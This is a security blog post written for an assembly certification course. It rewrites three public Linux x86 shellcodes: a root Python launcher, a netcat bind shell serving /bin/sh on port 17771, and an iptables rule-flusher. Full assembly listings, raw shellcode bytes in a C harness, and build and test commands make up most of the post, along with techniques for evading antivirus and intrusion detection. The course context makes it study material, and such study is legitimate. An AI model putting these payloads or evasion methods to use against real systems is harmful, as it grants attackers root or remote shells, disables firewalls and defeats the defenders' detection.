This post is about modifying shellcode by replacing instructions it uses without changing the overall logic of the given shellcode. This is most often done to evade antivirus and intrusion detection systems.

There are actually polymorphic engines in existence that can take a program and transform it so that the modified version consists of different code yet operates with the same functionality, but in this post we will be doing everything manually.

Sample #1: setreuid() + exec /usr/bin/python - 54 bytes by Ali Razmjoo

The first sample from shell-storm.org I will use here is a shellcode that starts the Python interpreter as root. On the referenced page the shellcode is presented in AT&T syntax. Here is the version translated to Intel syntax with my comments (I renamed the first and last labels so that their purpose is more obvious):

section .text
    global _start

_start:
    ; setreuid(0, 0): set real and effective UID to root
    xor eax, eax
    mov al, 0x46
    xor ebx, ebx
    xor ecx, ecx
    int 0x80
    jmp .data

.code:
    pop ebx             ; Load the address of the string into ebx
    xor eax, eax
    mov [ebx+15], al    ; Put a 0 byte at the end of the string
    mov [ebx+16], ebx   ; Store the string address right after the terminated string
    mov [ebx+20], eax   ; Store zeroes after the stored address
    mov al, 11          ; execve syscall #
    lea ecx, [ebx+16]   ; args, the 2nd argument
    lea edx, [ebx+20]   ; env vars, the 3rd argument
    int 0x80

.data:
    call .code
    python: db "/usr/bin/python"

Note that the above assembly program assembles and links, but does not work on its own because it modifies itself: writing to the executable .text section at runtime is a no-no and leads to a segmentation fault. To test the shellcode we have to use a C wrapper program. The shellcode bytes can be copied from the web page referenced above or regenerated with the scdump tool after building an executable from the above source code.

#include <stdio.h>
#include <string.h>

unsigned char shellcode[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16"
"\x5b\x31\xc0\x88\x43\x0f\x89\x5b\x10\x89\x43\x14\xb0\x0b\x8d\x4b\x10\x8d\x53"
"\x14\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x79"
"\x74\x68\x6f\x6e"; 

int main(void)
{
    /* strlen returns size_t and expects a char pointer */
    printf("Shellcode length: %zu\n", strlen((const char *)shellcode));
    (*(void(*)(void))shellcode)();
    return 0;
}

Testing the shellcode

At first, I wanted to modify the shellcode step by step, a couple of instructions at a time, preserving the overall functionality. But after reviewing the architecture of the given shellcode I realized that it is quite inefficient, so I decided to rewrite most of the code using a couple of shellcode-shortening techniques I learned while taking the SLAE course. Here is my modified copy of the shellcode with some comments:

section .text
    global _start

_start:
    ; setreuid(0, 0): set real and effective UID to root
    push byte 0x46
    pop eax
    xor ebx, ebx
    xor ecx, ecx
    int 0x80

    push ebx            ; Push null bytes to terminate the string
    push 0x6e6f6874     ; Push the //usr/bin/python string
    push 0x79702f6e     ; onto the stack
    push 0x69622f72
    push 0x73752f2f
    mul ebx             ; Zero out EAX and EDX as a result of multiplication by 0
    mov ebx, esp        ; String address, execve 1st argument - program name
    mov al, 11          ; execve syscall #
    int 0x80

First of all, note that this shellcode is 38 bytes long versus 54 bytes for the original, which is a 30% (!) reduction. Here is the list of tricks I used to reduce the shellcode size:

1) At the beginning the EAX register needs to be set to 0x46, the syscall number of setreuid. For that the original shellcode uses this sequence, which takes 4 bytes:

xor eax, eax
mov al, 0x46

To shave off a byte I replaced it with the following equivalent:

push byte 0x46
pop eax

2) The original shellcode uses the jmp-call-pop technique to access its data in a position-independent manner. I replaced this approach with pushing the string data directly onto the stack. This change alone saved the most bytes.

3) The original shellcode sets up execve arguments that are not needed:

lea ecx, [ebx+16]
lea edx, [ebx+20]

In reality both the ECX and EDX registers (the 2nd and 3rd arguments to the execve syscall, respectively) can be set to 0.

4) Lastly, to set EAX and EDX registers to 0 in one swoop I used the multiplication instruction:

mul ebx

which multiplies EAX by its operand and stores the 64-bit product in EDX:EAX (high half in EDX, low half in EAX). Since the operand (EBX) was 0, the product is 0 and both EAX and EDX end up zeroed.
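To make the semantics of the trick concrete, here is a minimal C model of the one-operand 32-bit mul. It is only a sketch: the names mul_result, mul32 and check_zeroing_trick are made up for this illustration and do not come from the original shellcode or any tool.

```c
#include <assert.h>
#include <stdint.h>

/* Register pair written by the one-operand 32-bit MUL instruction. */
struct mul_result {
    uint32_t eax; /* low 32 bits of the product */
    uint32_t edx; /* high 32 bits of the product */
};

/* Model of `mul r32`: EDX:EAX = EAX * operand (unsigned). */
struct mul_result mul32(uint32_t eax, uint32_t operand)
{
    uint64_t product = (uint64_t)eax * operand;
    struct mul_result r = { (uint32_t)product, (uint32_t)(product >> 32) };
    return r;
}

/* The trick itself: with a zero operand, any EAX yields EAX = EDX = 0. */
void check_zeroing_trick(uint32_t any_eax)
{
    struct mul_result r = mul32(any_eax, 0);
    assert(r.eax == 0 && r.edx == 0);
}
```

Whatever setreuid left in EAX, multiplying by a zeroed EBX clears both registers with a single 2-byte instruction.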

To convert the //usr/bin/python string to instructions that are used to push the string onto the stack I used the str4sc tool. I had to add an extra slash to the path so that the string length became a multiple of 4, a condition necessary for storing null-free strings on the stack.
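The conversion itself is simple enough to sketch in C. This is not the str4sc source, just a minimal illustration that assumes the string has already been padded to a multiple of 4 characters; the function names string_to_push_dwords and print_pushes are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Split `s` into little-endian dwords in the order they must be pushed
 * (last four characters first). Returns the number of dwords written,
 * or 0 if the length is not a non-zero multiple of 4 or `out` is too small.
 */
size_t string_to_push_dwords(const char *s, uint32_t *out, size_t out_cap)
{
    assert(s != NULL && out != NULL);
    size_t len = strlen(s);
    if (len == 0 || len % 4 != 0 || len / 4 > out_cap)
        return 0;

    size_t n = len / 4;
    for (size_t i = 0; i < n; i++) {
        /* Walk the string from its end, four characters at a time. */
        const unsigned char *p = (const unsigned char *)s + len - 4 * (i + 1);
        out[i] = (uint32_t)p[0] | (uint32_t)p[1] << 8 |
                 (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
    }
    return n;
}

/* Print the dwords as NASM push instructions, first push first. */
void print_pushes(const char *s)
{
    uint32_t dwords[64];
    size_t n = string_to_push_dwords(s, dwords, 64);
    for (size_t i = 0; i < n; i++)
        printf("    push 0x%08x\n", (unsigned)dwords[i]);
}
```

Calling print_pushes("//usr/bin/python") should reproduce the four push instructions from the listing above. The terminating null is not part of the output; it comes from the zeroed register that is pushed first.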

Sample #2: /bin/nc -le /bin/sh -vp 17771 - 58 bytes by Oleg Boytsev

Here comes our second shell-storm sample, the netcat-assisted bind shell:

global _start
section .text
 _start:
    xor eax, eax
    xor edx, edx
    push eax
    push 0x31373737     ;-vp17771
    push 0x3170762d
    mov esi, esp

    push eax
    push 0x68732f2f     ;-le//bin//sh
    push 0x6e69622f
    push 0x2f656c2d
    mov edi, esp

    push eax
    push 0x636e2f2f     ;/bin//nc
    push 0x6e69622f
    mov ebx, esp

    push edx
    push esi
    push edi
    push ebx
    mov ecx, esp
    mov al,11
    int 0x80

There is nothing complicated about this shellcode. All it does is start Netcat listening on port 17771 and serve a shell to anyone who connects to that port. At first glance I found only one way to reduce the overall size, and only by 1 byte: replacing all

push eax

instructions with

push edx

And then replacing the

xor eax, eax
...
mov al, 11

sequence (the two instructions are separated by other code in the listing) with

push byte 11
pop eax

Here is the result of the above manipulations:

global _start
section .text
 _start:
    xor edx, edx
    push edx
    push 0x31373737     ;-vp17771
    push 0x3170762d
    mov esi, esp

    push edx
    push 0x68732f2f     ;-le//bin//sh
    push 0x6e69622f
    push 0x2f656c2d
    mov edi, esp

    push edx
    push 0x636e2f2f     ;/bin//nc
    push 0x6e69622f
    mov ebx, esp

    push edx
    push esi
    push edi
    push ebx
    mov ecx, esp
    push byte 11
    pop eax
    int 0x80

Next, I will continue to mutate the shellcode, trying not to increase the overall size. One thing we can begin with is playing around with the strings at our disposal. We can modify them in such a way that the overall functionality stays the same. Remember that the length of each string must stay a multiple of 4. Here is how I modified the strings:

-vp17771        ->    -lp17771
-le//bin//sh    ->    -ve/bin///sh
/bin//nc        ->    //bin/nc

In the wild I would also change the port number, but for the sake of keeping functionality 100% unchanged I do not do it here.

The last change that will complicate AV detection is replacing one register with another wherever possible throughout the code. This works because the register is part of the instruction encoding, so the same instruction with a different register assembles to a different sequence of bytes, and that is exactly what we need. Here is the map of replacements I made in the original shellcode, followed by the whole body of the modified shellcode:

mov esi, esp -> mov eax, esp
mov edi, esp -> mov esi, esp
push esi     -> push eax
push edi     -> push esi

The final version:

global _start
section .text
 _start:
    xor edx, edx
    push edx
    push 0x31373737     ; -lp17771
    push 0x31706c2d
    mov eax, esp

    push edx
    push 0x68732f2f     ; -ve/bin///sh
    push 0x2f6e6962
    push 0x2f65762d
    mov esi, esp

    push edx
    push 0x636e2f6e     ;//bin/nc
    push 0x69622f2f
    mov ebx, esp

    push edx
    push eax
    push esi
    push ebx
    mov ecx, esp
    push byte 11
    pop eax
    int 0x80
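To see why swapping registers changes the bytes, it helps to look at how the two instruction forms from the replacement map are encoded. The C sketch below is an illustration only: the enum and function names are made up, and it covers just push r32 and the mov r32, esp form (opcode 0x89) that appears in these listings.

```c
#include <assert.h>
#include <stdint.h>

/* Register numbers used in 32-bit x86 instruction encodings. */
enum reg32 { EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI };

/* `push r32` is the single byte 0x50 + register number. */
uint8_t encode_push(enum reg32 r)
{
    assert((unsigned)r <= EDI);
    return (uint8_t)(0x50 + r);
}

/*
 * `mov dst, esp` in the 0x89 /r form:
 * opcode 0x89, then ModRM = 11 (register mode) | ESP as source | dst.
 */
void encode_mov_from_esp(enum reg32 dst, uint8_t out[2])
{
    assert((unsigned)dst <= EDI);
    out[0] = 0x89;
    out[1] = (uint8_t)(0xC0 | (ESP << 3) | dst);
}
```

With these helpers, mov esi, esp comes out as 89 e6 while mov eax, esp is 89 e0, and push esi (56) becomes push eax (50). Each swap therefore changes one byte without changing the instruction length.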

I could continue modifying the shellcode to bring its pattern correlation with the original closer to zero, but the size of the shellcode would inevitably go up. With our last sample I will sacrifice size and show how some very simple steps can help you on the AV evasion path.

Sample #3: Linux/x86 - iptables --flush - 43 bytes by Hamza Megahed

The purpose of the last shellcode sample I will analyze in this post is to flush all iptables rules. Here is the original listing translated to Intel syntax:

section .text
    global _start

_start:
    xor eax, eax
    push eax
    push word 0x462d
    mov esi, esp
    push eax
    push 0x73656c62
    push 0x61747069
    push 0x2f6e6962
    push 0x732f2f2f
    mov ebx, esp
    push eax
    push esi
    push ebx
    mov ecx, esp
    mov edx, eax
    mov al, 0xb
    int 80h

All the shellcode does is call the /sbin/iptables with -F flag.

A couple of notes before I begin mutating the code. In this case I will not try to keep the shellcode from growing. Quite the opposite, I will expand single instructions into two or more. The only limit I am going to stick to is that the resulting mutant must not exceed 150% of the original shellcode size.

Despite what I've just said, I couldn't stop myself from first decreasing the shellcode size by 1 byte =). This change still serves the end goal of changing the shellcode structure. To shave the byte off I replaced EAX with EDX in every occurrence of the following two instructions:

xor eax, eax

push eax

And to make the shellcode work again, I removed

mov edx, eax

and replaced

mov al, 0xb

with

push 0xb
pop eax

The line I removed zeroed out EDX, which became unnecessary after the previous modification: EDX is already all 0s at that point. The replacement is just an equivalent way of loading 0xb (execve syscall #) into EAX that doesn't depend on EAX being zeroed first.

Here is the intermediate result incorporating the above changes:

section .text
    global _start

_start:
    xor edx, edx
    push edx
    push word 0x462d
    mov esi, esp
    push edx
    push 0x73656c62
    push 0x61747069
    push 0x2f6e6962
    push 0x732f2f2f
    mov ebx, esp
    push edx
    push esi
    push ebx
    mov ecx, esp
    push 0xb
    pop eax
    int 80h

Now, let me show how with a little imagination you can expand any instruction, thus modifying the underlying opcodes (but be careful to not add null or other bad chars relevant to your case):

1) The third line pushes the -F string onto the stack. We can expand it in some fancy way:

mov bx, 0x2316
add bx, 0x2317
push bx

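2) Now, why don't we apply some very lame encryption by manually subtracting 1 from every byte of the ///sbin/iptables string, and then adding 1 back to every byte at runtime, once the string is already on the stack? Dictum factum. Note that mov cl, 16 only sets the low byte of ECX, so the loop relies on the rest of ECX being zero at that point. The modified part of the code follows: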

    push 0x72646b61
    push 0x60736F68
    push 0x2e6d6861
    push 0x722e2e2e
    mov ebx, esp
; Decryption
    mov esi, esp
    mov edi, esp
    mov cl, 16
.decrypt:
    lodsb
    add eax, 1
    stosb
    loop .decrypt

3) I'd be happy to continue bubbling up the code, but at this point the initial 43 bytes of code became 62 bytes, which is just 2 bytes short of the 150% limit. To not waste those 2 bytes and mutate the code a little bit more we can insert a couple of nop-equivalents close to the end of the code. For that purpose I used the std and cld instructions that do not affect anything unless you are working with string instructions.
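The constants used in steps 1 and 2 do not have to be worked out by hand. Below is a minimal C sketch of both calculations, under the assumption that the only bad byte is 0x00. All function names are hypothetical and were picked just for this illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* True if neither byte of the 16-bit value is zero. */
int word_is_null_free(uint16_t w)
{
    return (w & 0x00ff) != 0 && (w & 0xff00) != 0;
}

/*
 * Step 1: find a and b with a + b == target (mod 2^16) where neither
 * a nor b contains a zero byte. The search starts at target / 2.
 * Returns 1 on success, 0 if no such pair exists.
 */
int split_word(uint16_t target, uint16_t *a, uint16_t *b)
{
    assert(a != NULL && b != NULL);
    for (uint32_t i = 0; i < 0x10000; i++) {
        uint16_t x = (uint16_t)(target / 2 + i);
        uint16_t y = (uint16_t)(target - x);
        if (word_is_null_free(x) && word_is_null_free(y)) {
            *a = x;
            *b = y;
            return 1;
        }
    }
    return 0;
}

/* Step 2, build time: subtract 1 from every byte (wraps modulo 256). */
void encode_minus_one(unsigned char *buf, size_t len)
{
    assert(buf != NULL);
    for (size_t i = 0; i < len; i++)
        buf[i] = (unsigned char)(buf[i] - 1);
}

/* Step 2, run time: the C equivalent of the lodsb / add / stosb loop. */
void decode_plus_one(unsigned char *buf, size_t len)
{
    assert(buf != NULL);
    for (size_t i = 0; i < len; i++)
        buf[i] = (unsigned char)(buf[i] + 1);
}
```

For the target 0x462d the search stops immediately at 0x2316 and 0x2317, the pair used above. Running encode_minus_one over ///sbin/iptables gives the bytes behind the four encoded push instructions. A string containing the byte 0x01 would encode to a null, so it needs a different offset.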

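The final, working version of the mutated shellcode (the pointer to the -F string is now kept in EBP, because ESI is overwritten by the decryption loop):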

section .text
    global _start

_start:
    xor edx, edx
    push edx
    mov bx, 0x2316
    add bx, 0x2317
    push bx
    mov ebp, esp
    push edx
    push 0x72646b61
    push 0x60736F68
    push 0x2e6d6861
    push 0x722e2e2e
    mov ebx, esp
; Decryption 
    mov esi, esp
    mov edi, esp
    mov cl, 16
.decrypt:
    lodsb
    add eax, 1
    stosb
    loop .decrypt
    push edx
    std
    push ebp
    cld
    push ebx
    mov ecx, esp
    push 0xb
    pop eax
    int 80h

To make sure it still works, build it and run it with the commands below. The test assumes that your iptables rule set is empty to begin with, as is the default on Kali Linux:

nasm -f elf ipt2.asm && ld -o ipt2 ipt2.o
iptables -A INPUT -p tcp --dport 22 -j ACCEPT && iptables -L -vn
./ipt2 && iptables -L -vn

After running the second command you should see a rule added to the INPUT chain of the filter table. After running the third command the rule should disappear (flushed by our code).
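Besides the functional test, the two constraints mentioned earlier (no bad characters and the 150% size limit) can be checked mechanically once the bytes are extracted. The following C helpers are a sketch under my own assumptions: the names find_bad_byte and within_size_budget are hypothetical, and the list of bad bytes depends entirely on your target.

```c
#include <assert.h>
#include <stddef.h>

/*
 * Return the offset of the first byte of `code` that appears in `bad`,
 * or -1 if the shellcode contains none of them.
 */
long find_bad_byte(const unsigned char *code, size_t len,
                   const unsigned char *bad, size_t nbad)
{
    assert(code != NULL && bad != NULL);
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (code[i] == bad[j])
                return (long)i;
    return -1;
}

/* True if `mutated` bytes stay within 150% of `original` bytes. */
int within_size_budget(size_t original, size_t mutated)
{
    return mutated * 2 <= original * 3;
}
```

For a 43-byte original the budget check accepts anything up to 64 bytes, which matches the limit used for the last sample.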

This blog post was created to fulfill the requirements of the SecurityTube Linux Assembly Expert certification. Student id: SLAE-685.

The source files created while completing the assignment can be found in my GitHub repository.

Oleg's Web Log

Mutating existing shellcodes (SLAE, Assignment #6)
